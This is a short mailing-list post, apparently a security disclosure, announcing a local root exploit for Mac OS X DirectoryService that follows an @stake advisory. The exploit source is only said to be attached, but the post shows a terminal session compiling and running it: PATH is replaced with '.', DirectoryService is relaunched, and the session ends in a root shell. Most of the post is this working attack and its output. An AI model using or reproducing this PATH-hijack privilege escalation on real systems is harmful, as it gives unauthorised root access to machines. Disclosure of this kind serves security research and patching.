From: neeko at haackey.com (Neeko Oni)
Subject: OS X DirectoryService DoS {@...ke adv:

Hoping to encourage people to figure out what @stake was talking about
in regards to the OS X DirectoryService DoS, I've attached a local
exploit for DirectoryService _once is has been crashed/killed_.

[sera:~] loser% gcc osxds.c -o touch
[sera:~] loser% ./touch
Original path: /bin:/sbin:/usr/bin:/usr/sbin
New path: .
Executing DirectoryService with false PATH...
Forked DirectoryService, pausing before shell exec...
sh: rm: command not found
Cross your fingers.
Path restored: /bin:/sbin:/usr/bin:/usr/sbin
euid is root.
root:~# id
uid=0(root) gid=20(staff) groups=20(staff)
root:~#